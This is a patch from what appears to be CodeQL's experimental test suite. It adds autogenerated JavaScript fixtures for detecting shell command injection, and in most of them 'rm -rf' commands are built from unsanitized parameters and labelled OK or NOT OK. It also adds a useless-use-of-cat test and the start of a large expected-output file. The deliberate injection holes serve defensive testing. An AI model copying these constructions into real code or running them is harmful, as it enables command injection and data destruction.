" + name); // OK + } else { + cp.exec("rm -rf " + name); // NOT OK + } +} + +module.exports.blackList2 = function (name) { + cp.exec("rm -rf " + name); // NOT OK + + if (!/^([a-zA-Z0-9]+))?$/.test(name)) { + cp.exec("rm -rf " + name); // NOT OK + process.exit(-1); + } + + cp.exec("rm -rf " + name); // OK - but FP due to tracking flow through `process.exit()`. [INCONSISTENCY] +} + +module.exports.accessSync = function (name) { + cp.exec("rm -rf " + name); // NOT OK + + try { + path.accessSync(name); + } catch (e) { + return; + } + + cp.exec("rm -rf " + name); // OK - but FP due to `path.accessSync` not being recognized as a sanitizer. [INCONSISTENCY] +} + +var cleanInput = function (s) { + if (/[^A-Za-z0-9_\/:=-]/.test(s)) { + s = "'" + s.replace(/'/g, "'\\''") + "'"; + s = s.replace(/^(?:'')+/g, '') // unduplicate single-quote at the beginning + .replace(/\\'''/g, "\\'"); // remove non-escaped single-quote if there are enclosed between 2 escaped + } + return s; +} + +module.exports.goodSanitizer = function (name) { + cp.exec("rm -rf " + name); // NOT OK + + var cleaned = cleanInput(name); + + cp.exec("rm -rf " + cleaned); // OK +} + +var fs = require("fs"); +module.exports.guard2 = function (name) { + cp.exec("rm -rf " + name); // NOT OK + + if (!fs.existsSync("prefix/" + name)) { + cp.exec("rm -rf prefix/" + name); // NOT OK + return; + } + cp.exec("rm -rf prefix/" + name); // OK +} + +module.exports.sanitizerProperty = function (obj) { + cp.exec("rm -rf " + obj.version); // NOT OK + + obj.version = ""; + + cp.exec("rm -rf " + obj.version); // OK +} + +module.exports.Foo = class Foo { + start(opts) { + cp.exec("rm -rf " + opts.bla); // NOT OK + this.opts = {}; + this.opts.bla = opts.bla + + cp.exec("rm -rf " + this.opts.bla); // NOT OK + } +} + +function sanitizeShellString(str) { + let result = str; + result = result.replace(/>/g, ""); + result = result.replace(/' || + s[i] === '<' || + s[i] === '*' || + s[i] === '?' || + s[i] === '[' || + s[i] === ']' || + s[i] === '|' || + s[i] === '˚' || + s[i] === '$' || + s[i] === ';' || + s[i] === '&' || + s[i] === '(' || + s[i] === ')' || + s[i] === ']' || + s[i] === '#' || + s[i] === '\\' || + s[i] === '\t' || + s[i] === '\n' || + s[i] === '\'' || + s[i] === '`' || + s[i] === '"')) { + result = result + s[i]; + } + } + return result; +} + +module.exports.sanitizer3 = function (name) { + cp.exec("rm -rf " + name); // NOT OK + + var sanitized = yetAnohterSanitizer(name); + cp.exec("rm -rf " + sanitized); // OK +} + +const cp = require("child_process"); +const spawn = cp.spawn; +module.exports.shellOption = function (name) { + cp.exec("rm -rf " + name); // NOT OK + + cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // NOT OK + cp.spawn("rm", ["-rf", name], {shell: true}); // NOT OK + cp.execFileSync("rm", ["-rf", name], {shell: true}); // NOT OK + cp.spawnSync("rm", ["-rf", name], {shell: true}); // NOT OK + + const SPAWN_OPT = {shell: true}; + + spawn("rm", ["first", name], SPAWN_OPT); // NOT OK + var arr = []; + arr.push(name); // NOT OK + spawn("rm", arr, SPAWN_OPT); + spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // This is bad, but the alert location is down in `build`. +} + +function build(first, last) { + var arr = []; + if (something() === 'gm') + arr.push('convert'); + first && arr.push(first); + last && arr.push(last); // NOT OK + return arr; +}; + +var asyncExec = require("async-execute"); +module.exports.asyncStuff = function (name) { + asyncExec("rm -rf " + name); // NOT OK +} + +const myFuncs = { + myFunc: function (name) { + asyncExec("rm -rf " + name); // NOT OK + } +}; + +module.exports.blabity = {}; + +Object.defineProperties( + module.exports.blabity, + Object.assign( + {}, + Object.entries(myFuncs).reduce( + (props, [ key, value ]) => Object.assign( + props, + { + [key]: { + value, + configurable: true, + }, + }, + ), + {} + ) + ) +); + +const path = require('path'); +const {promisify} = require('util'); + +const exec = promisify(require('child_process').exec); + +module.exports = function check(config) { + const cmd = path.join(config.installedPath, 'myBinary -v'); // NOT OK + return exec(cmd); +} + +module.exports.splitConcat = function (name) { + let args = ' my name is ' + name; // NOT OK + let cmd = 'echo'; + cp.exec(cmd + args); +} + +module.exports.myCommand = function (myCommand) { + let cmd = `cd ${cwd} ; ${myCommand}`; // OK - the parameter name suggests that it is purposely a shell command. + cp.exec(cmd); +} + +(function () { + var MyThing = { + cp: require('child_process') + }; + + module.exports.myIndirectThing = function (name) { + MyThing.cp.exec("rm -rf " + name); // NOT OK + } +}); + + +var imp = require('./isImported'); +for (var name in imp){ + module.exports[name] = imp[name]; +} + +module.exports.sanitizer4 = function (name) { + cp.exec("rm -rf " + name); // NOT OK + + if (isNaN(name)) { + cp.exec("rm -rf " + name); // NOT OK + } else { + cp.exec("rm -rf " + name); // OK + } + + if (isNaN(parseInt(name))) { + cp.exec("rm -rf " + name); // NOT OK + } else { + cp.exec("rm -rf " + name); // OK + } + + if (isNaN(+name)) { + cp.exec("rm -rf " + name); // NOT OK + } else { + cp.exec("rm -rf " + name); // OK + } + + if (isNaN(parseInt(name, 10))) { + cp.exec("rm -rf " + name); // NOT OK + } else { + cp.exec("rm -rf " + name); // OK + } + + if (isNaN(name - 0)) { + cp.exec("rm -rf " + name); // NOT OK + } else { + cp.exec("rm -rf " + name); // OK + } + + if (isNaN(name | 0)) { // <- not a sanitizer + cp.exec("rm -rf " + name); // NOT OK + } else { + cp.exec("rm -rf " + name); // NOT OK + } +} diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js new file mode 100644 index 00000000000..db1ecd02413 --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js @@ -0,0 +1,9 @@ +var cp = require("child_process") + +module.exports = function (name) { + cp.exec("rm -rf " + name); // NOT OK - is imported from main module. +}; + +module.exports.foo = function (name) { + cp.exec("rm -rf " + name); // NOT OK - is imported from main module. +}; \ No newline at end of file diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js new file mode 100644 index 00000000000..b107ac03d7a --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js @@ -0,0 +1,5 @@ +var cp = require("child_process") + +module.exports = function (name) { + cp.exec("rm -rf " + name); // OK, is not exported to a main-module. +}; \ No newline at end of file diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js new file mode 100644 index 00000000000..7d41ba591bf --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js @@ -0,0 +1,6 @@ +// this file is imported from `index.js`. +define(function (require) { + return { + amdSub: require("./amdSub"), + }; +}); diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js new file mode 100644 index 00000000000..a594c218239 --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js @@ -0,0 +1,5 @@ +const cp = require("child_process"); + +module.exports = function (name) { + cp.exec("rm -rf " + name); // NOT OK - this function is exported from `amd.js` +}; \ No newline at end of file diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js new file mode 100644 index 00000000000..6e7d3498723 --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js @@ -0,0 +1,15 @@ +var cp = require("child_process") + +module.exports = function (name) { + cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. +}; + +module.exports.foo = function (name) { + cp.exec("rm -rf " + name); // NOT OK - this is being called explicitly from child_process-test.js +}; + +module.exports.amd = require("./amd.js"); + +module.exports.arrToShell = function (cmd, arr) { + cp.spawn("echo", arr, {shell: true}); // NOT OK +} \ No newline at end of file diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts new file mode 100644 index 00000000000..1e945f15e72 --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts @@ -0,0 +1,5 @@ +var cp = require("child_process") + +export default function (name) { + cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file. +} diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js new file mode 100644 index 00000000000..c46fed33181 --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js @@ -0,0 +1,5 @@ +var cp = require("child_process") + +module.exports = function (name) { + cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file. +}; \ No newline at end of file diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts new file mode 100644 index 00000000000..9fa88413cc8 --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts @@ -0,0 +1,5 @@ +var cp = require("child_process") + +module.exports = function (name) { + cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. +}; diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js new file mode 100644 index 00000000000..820349c5c62 --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js @@ -0,0 +1,8 @@ +const dispatch = { + GET: require("./bla"), + POST: require("./subsub"), +}; + +module.exports.foo = function (name, type) { + dispatch[type](name); +}; diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js new file mode 100644 index 00000000000..952288a82ce --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js @@ -0,0 +1,5 @@ +const cp = require("child_process") + +module.exports = function (name) { + cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. +}; diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js new file mode 100644 index 00000000000..9654b26dec0 --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js @@ -0,0 +1,166 @@ +var express = require('express'); +var child_process = require('child_process'); +var execSync = child_process.execSync; +var exec = child_process.exec; +var spawn = child_process.spawn; +var spawnSync = child_process.spawnSync; +var fs = require('fs'); +var app = express(); + +exec("cat foo/bar", function (err, out) {}); // NOT OK + +exec("cat /proc/" + id + "/status", function (err, out) { // NOT OK + console.log(out); +}); + +execSync('cat /proc/cpuinfo').toString(); // NOT OK. + +execSync(`cat ${newpath}`) // NOT OK + +execSync('cat package.json | wc -l'); // OK - pipes! + +execSync('cat /proc/cpuinfo /foo/bar').toString(); // OK multiple files. + +execSync(`cat ${newpath} /foo/bar`).toString(); // OK multiple files. + +exec(`cat ${newpath} | grep foo`, function (err, out) { }) // OK - pipes + +execSync(`cat ${newpath}`, {uid: 1000}) // OK - non trivial options + +exec('cat *.js | wc -l', { cwd: './' }, function (err, out) { }); // OK - wildcard and pipes + +execSync(`cat foo/bar/${newpath}`); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync) + +execSync(`cat foo/bar/${newpath}`, {encoding: 'utf8'}); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync) + +execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'}); // OK (fs.readFileSync cannot emulate uid / gid)) + +execSync('cat /proc/cpuinfo > foo/bar/baz').toString(); // OK. + +execSync(`cat ${newpath} > ${destpath}`).toString(); // OK. + +execSync(`cat ${files.join(' ')} > ${outFile}`); // OK + +execSync(`cat ${files.join(' ')}`); // OK - but flagged - not just a simple file read [INCONSISTENCY] + +exec("cat /proc/cpuinfo | grep name"); // OK - pipes + +execSync(`cat ${newpath} | ${othertool}`); // OK - pipes + +function cat(file) { + return execSync('cat ' + file).toString(); // NOT OK +} + +execSync("sh -c 'cat " + newpath + "'"); // NOT OK - but not flagged [INCONSISTENCY] + +var execFile = child_process.execFile; +var execFileSync = child_process.execFileSync; + +execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // NOT OK + // Not using stderr + console.log(stdout); +}); + +execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // OK. - stderr is used. + console.log(stderr); +}); + + +execFile('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}, function(error, stdout, stderr ) { // NOT OK + // Not using stderr + console.log(stdout); +}); + +execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}); // NOT OK + +execFileSync('/bin/cat', [ 'pom.xml' ]); // NOT OK + +var opts = {encoding: 'utf8'}; +execFileSync('/bin/cat', [ 'pom.xml' ], opts); // NOT OK + +var anOptsFileNameThatIsTooLongToBePrintedByToString = {encoding: 'utf8'}; +execFileSync('/bin/cat', [ 'pom.xml' ], anOptsFileNameThatIsTooLongToBePrintedByToString); // NOT OK + +execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'someEncodingValueThatIsCompletelyBogusAndTooLongForToString'}); // NOT OK + +execFileSync('/bin/cat', [ "foo/" + newPath + "bar" ], {encoding: 'utf8'}); // NOT OK + +execSync('cat /proc/cpuinfo' + foo).toString(); // NOT OK. + +execFileSync('/bin/cat', [ `foo/bar/${newpath}` ]); // NOT OK + +execFileSync('node', [ `foo/bar/${newpath}` ]); // OK - not a call to cat + +exec("cat foo/bar", function (err, out) {}); // NOT OK + +exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK + +exec("cat foo/bar", (err, out) => doSomethingWith(out)); // NOT OK + +execFileSync('/bin/cat', [ 'pom.xml' ], unknownOptions); // OK - unknown options. + +exec("node foo/bar", (err, out) => doSomethingWith(out)); // OK - Not a call to cat + +execFileSync('node', [ `cat` ]); // OK - not a call to cat + +exec("cat foo/bar&", function (err, out) {}); // OK - contains & +exec("cat foo/bar,", function (err, out) {}); // OK - contains , +exec("cat foo/bar$", function (err, out) {}); // OK - contains $ +exec("cat foo/bar`", function (err, out) {}); // OK - contains ` + +spawn('cat', { stdio: ['pipe', stdin, 'inherit'] }); // OK - Non trivial use. (But weird API use.) + +(function () { + const cat = spawn('cat', [filename]); // OK - non trivial use. + cat.stdout.on('data', (data) => { + res.write(data); + }); + cat.stdout.on('end', () => res.end()); +})(); + +var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK + +var notDead = exec("cat foo/bar", (err, out) => {console.log(out)}); // OK +console.log(notDead); + +(function () { + var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK + + someCall( + exec("cat foo/bar", (err, out) => {console.log(out)}) // OK - non-trivial use of returned proccess. + ); + + return exec("cat foo/bar", (err, out) => {console.log(out)}); // OK - non-trivial use of returned proccess. +})(); + +const stdout2 = execSync('cat /etc/dnsmasq.conf', { // NOT OK. + encoding: 'utf8' +}); + +exec('/bin/cat', function (e, s) {}); // OK + +spawn("cat") // OK + + +var shelljs = require("shelljs"); +shelljs.exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK +shelljs.exec("cat foo/bar", {encoding: 'utf8'}); // NOT OK +shelljs.exec("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK + +let cspawn = require('cross-spawn'); +cspawn('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK +cspawn('cat', ['foo/bar'], { encoding: 'utf8' }, (err, out) => {console.log(out)}); // NOT OK +cspawn('cat', ['foo/bar'], (err, out) => {console.log(out)}); // NOT OK +cspawn('cat', ['foo/bar']); // NOT OK +cspawn('cat', (err, out) => {console.log(out)}); // OK +cspawn('cat', { encoding: 'utf8' }); // OK + +let myResult = cspawn.sync('cat', ['foo/bar']); // NOT OK +let myResult = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK + +var execmod = require('exec'); +execmod("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK +execmod("cat foo/bar", {encoding: 'utf8'}); // NOT OK +execmod("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK + + \ No newline at end of file diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/update_endpoint_test_files.py b/javascript/ql/experimental/adaptivethreatmodeling/test/update_endpoint_test_files.py index 131e4f8f93f..6eb62baa339 100755 --- a/javascript/ql/experimental/adaptivethreatmodeling/test/update_endpoint_test_files.py +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/update_endpoint_test_files.py @@ -21,11 +21,16 @@ file_extensions_to_copy = ['.js', '.ts'] # Maps each security query to the test root path for that security query. Each test root path is the # path of that test relative to a checkout of github/codeql. test_root_relative_paths = { - 'NosqlAndSqlInjection': 'javascript/ql/test/query-tests/Security/CWE-089', + 'NosqlAndSqlInjection': + 'javascript/ql/test/query-tests/Security/CWE-089', 'TaintedPath': 'javascript/ql/test/query-tests/Security/CWE-022/TaintedPath', - 'Xss': 'javascript/ql/test/query-tests/Security/CWE-079', - 'XssThroughDom': 'javascript/ql/test/query-tests/Security/CWE-116' + 'Xss': + 'javascript/ql/test/query-tests/Security/CWE-079', + 'XssThroughDom': + 'javascript/ql/test/query-tests/Security/CWE-116', + 'ShellCommandInjectionFromEnvironment': + 'javascript/ql/test/query-tests/Security/CWE-078', } logging.basicConfig(level=logging.INFO) From b08fa43fdf1ce0268dd89bedd47728d2f38af9a4 Mon Sep 17 00:00:00 2001 From: Jean Helie Date: Fri, 16 Dec 2022 17:37:41 +0100 Subject: [PATCH 311/381] update tests --- .../EndpointFeatures.expected | 156537 +++++++++++++++ .../ExtractEndpointDataInference.expected | 173 + .../ExtractEndpointDataTraining.expected | 5093 + .../FilteredTruePositives.expected | 1 + .../getALikelyExternalLibraryCall.expected | 608 + .../ExtractEndpointDataTraining.expected | 16 + .../ExtractEndpointLabelEncoding.expected | 1 + 7 files changed, 162429 insertions(+) diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/EndpointFeatures.expected b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/EndpointFeatures.expected index a8dbf544fdd..8bcec723886 100644 --- a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/EndpointFeatures.expected +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/EndpointFeatures.expected @@ -1,14 +1,203 @@ tokenFeatures +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:1:1:1:0 | this | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:1:1:1:0 | this | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:1:16:1:24 | "mongodb" | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:1:16:1:24 | "mongodb" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:1:16:1:24 | "mongodb" | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:8 | find | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:8 | find | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:8 | find | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | 'arguments' object of method find of interface Collection | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | 'arguments' object of method find of interface Collection | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | 'arguments' object of method find of interface Collection | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | exceptional return of method find of interface Collection | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | exceptional return of method find of interface Collection | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | exceptional return of method find of interface Collection | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | find(qu ... ): any; | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | find(qu ... ): any; | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | find(qu ... ): any; | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | find(qu ... ): any; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | find(qu ... ): any; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | find(qu ... ): any; | contextSurroundingFunctionParameters | (query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | find(qu ... ): any; | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | find(qu ... ): any; | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | find(qu ... ): any; | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | return of method find of interface Collection | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | return of method find of interface Collection | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:5:3:26 | return of method find of interface Collection | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:10:3:14 | query | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:10:3:14 | query | contextSurroundingFunctionParameters | (query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:3:10:3:14 | query | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:6:16:6:25 | "mongoose" | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:6:16:6:25 | "mongoose" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:6:16:6:25 | "mongoose" | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:8 | find | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:8 | find | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:8 | find | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | 'arguments' object of method find of interface Model | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | 'arguments' object of method find of interface Model | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | 'arguments' object of method find of interface Model | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | exceptional return of method find of interface Model | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | exceptional return of method find of interface Model | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | exceptional return of method find of interface Model | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | find(qu ... ): any; | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | find(qu ... ): any; | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | find(qu ... ): any; | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | find(qu ... ): any; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | find(qu ... ): any; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | find(qu ... ): any; | contextSurroundingFunctionParameters | (query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | find(qu ... ): any; | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | find(qu ... ): any; | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | find(qu ... ): any; | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | return of method find of interface Model | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | return of method find of interface Model | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:5:8:26 | return of method find of interface Model | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:10:8:14 | query | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:10:8:14 | query | contextSurroundingFunctionParameters | (query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:8:10:8:14 | query | fileImports | | +| 